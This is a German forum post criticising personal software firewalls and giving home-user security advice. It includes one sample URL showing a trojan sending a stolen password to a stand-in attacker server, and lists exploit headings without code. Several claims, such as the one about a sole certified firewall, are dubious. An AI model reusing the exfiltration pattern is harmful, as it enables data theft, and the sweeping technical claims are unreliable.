vielleicht kann ja einer von den mods das mal oben festpinnen?
Was soll eine Firewall leisten?
Glaubt man den Werbeaussagen der Hersteller von ZoneAlarm, Kerio, Norton Personal Firewall usw., dann schützt eine "Firewall" so ziemlich vor allem, was es böses gibt im Internet.
Da eine Firewall Ports öffnet oder schliesst, kann sie nicht gegen Viren schützen, denn ein Virus ist eine Software und eine Firewall überwacht nicht den Datenstrom.
Sie kann auch nicht gegen Trojaner, Homecall-Software u.ä. schützen, wenn diese erst mal auf dem Rechner sind. Ein intelligent programmierter Trojaner benutzt z.b. ebenfalls den Port 80, den man nicht sperren kann, will man noch surfen. Oder er lässt den Browser einfach die Adresse des Servers des "Hackers" aufrufen und hängt an diese Adresse die gestohlenen Daten an:
http://www.boeser.server.com/speichern.php&…lpasswort=mamma
Auch eine sogenannte "Application-Firewall" hilft da nicht, denn bösartige Programme klinken sich einfach im Arbeitsspeicher in eine "gute" Anwendung ein und lassen ihre Daten von dieser Übertragen oder nennen sich selber "Internet Explorer" und was macht der User, wenn die Firewall ihn fragt, ob der "Internet Explorer" ins Internet darf? Richtig, er klickt auf "Ja". Wenn es das bösartige Programm nicht sogar selber tut. JEDE aktion, die der angemeldete User machen kann, kann prinzipiell auch von einer Software ausgelöst werden, auch auf Buttons klicken und das schneller, als der User überhaupt die Abfrage sieht.Eine Firewall, die diesen Namen auch verdient, läuft auf zwei voneinander unabhängigen Rechnern mit verschiedenen Betriebssystemen, auf denen keine andere Software läuft. (Die einzige zetifizierte Firewall läuft auf OpenBSD b.z.w. FreeDOS-32)
Und sie ist nur sinnvoll als Ergänzung zu einem Sicherheitskonzept in grossen Firmennetzwerken.Auch der sogenannte "Stealth-Modus" verschiedener Software-"Firewalls" ist ein Witz und Ärgernis für Profis.
Wenn an eine IP Daten gesendet werden (z.b. "ping"), gibt laut TCP/IP-Protokoll der davor beim Provider sitzende Router ein "nicht gefunden"-signal zurück, wenn die IP gerade nicht vergeben ist. Ansonsten ist das die Aufgabe des Rechners, der momentan diese IP hat.
Schweigt der Rechner, weil sein "schlauer" User eine von solchen "Intelligenz-Bolzen" programmierte Software-"Firewall" im "Stealth-Modus" betreibt, verstösst er (1.) gegen das TCP/IP-Protokoll, (2.) wird das laut Protokoll als verlorengegangenes Datenpaket gewertet und die Übertragung wiederholt (= mehr Traffic) und (3.) ist dem potentiellen Angreifer dann klar, das der Depp am anderen Ende ihm mit einem fehlerhaft arbeitenden Stück Software weitere Einbruchsmöglichkeiten bietet. Es sind in "Fachkreisen" für alle Software-"Firewalls" Exploits (Beschreibungen für Angriffe auf Sicherheitslücken durch Softwarefehler dieser Programme) bekannt!Anstatt mit einer potentiell selber fehlerhaften Software offene Ports zu sperren, ist es für den Privatanwender viel sinnvoller, diese offenen Ports zu schliessen. Das heist, die unter diesen Ports laufenden Dienste zu beenden oder wenn sie lokal benötigt werden, ihre unsinnige Verbindung zum Internet zu deaktivieren.
EMPFEHLUNG: NT-Dienste sicher konfigurieren (Windows2000/XP)Diese Seite bietet ein Script an, das zusammen mit einem kleinen Programm von Microsoft (alles dort verlinkt) Euren Rechner automatisch sicher konfigurieren kann.
Sicherheit beginnt im Kopf!
Wo der User auf alles klickt, was nicht bei drei auf den Bäumen ist, helfen auch keine Firewalls und Virenscanner.Zuerst solltet Ihr mal vom kompilierten Sicherheitsrisiko "Internet Explorer" auf einen richtigen Browser umsteigen und im IE (ganz wichtig!) ActiveX deaktivieren. Später wird dann nur für Seiten, denen Ihr vertraut und nur, wenn es sich garnicht vermeiden lässt, ActiveX aktiviert (zonenmodell), denn ActiveX hat auf dem Rechner, wo es ausgeführt wird grundsätzlich alle Rechte, die auch der User hat. Es verhält sich, wie ein lokales Programm!
Auch von Outlook/Outlook Express solltet Ihr die Finger lassen. Das ist die grösste Viren-Schleuder, die es gibt. Benutzt ein anderes Mailprogramm.
Und eins noch: mindestens ein mal pro Woche nach aktuellen Patches von Microsoft schauen und auch installieren! Wer dem automatischen "Windows Update" nicht traut, muss das halt von Hand machen...
den beitrag habe ich auseinem anderen board kopiert, wo ich ihn vor ca. 1 jahr geschrieben habe.
ausserdem kann ich noch das video vom "Chaosseminar: Personal Firewalls" des ChaosComputerClub sehr empfehlen:
http://ulm.ccc.de/chaos-seminar/…/recording.html
Ergänzung:
Die WinXP-Firewall ist zwar schwierig zu konfigurieren, aber wenn man unbedingt so etwas zu brauchen meint, ist die immer noch viel besser , als alle Desktop-Firewalls von Drittanbietern.
GRUND: diese FW ist direkt in den TCP-Stack des Betriebssystems integriert, d.h., sie sitzt zumindest fast an der richtigen Stelle, da, wo die Datenpakete reinkommen.
Andere Firewalls setzen auf diesen Teil des Betriebssystems auf , was heist, dass zuerst das Betriebssystem ALLE Datenpakete in Empfang nimmt und dann erst an die Firewall weitergibt. DANN KANN ES ABER SCHON ZU SPÄT SEIN.Die mit Abstand bessere Lösung bleibt es weiterhin, die Dienste des Betriebssystems richtig zu konfigurieren , siehe: http://www.ntsvcfg.de
Exploits für Zonealarm
Exploits für Outpost
Exploits für Blackice
Exploits für Norton/Symantec FirewallsVier Tools, mit denen Ihr Eure Firewall selber testen Könnt:
Leak Test
Firehole
YALTA - Yet Another Leak Test Application
Leak Test von GRC
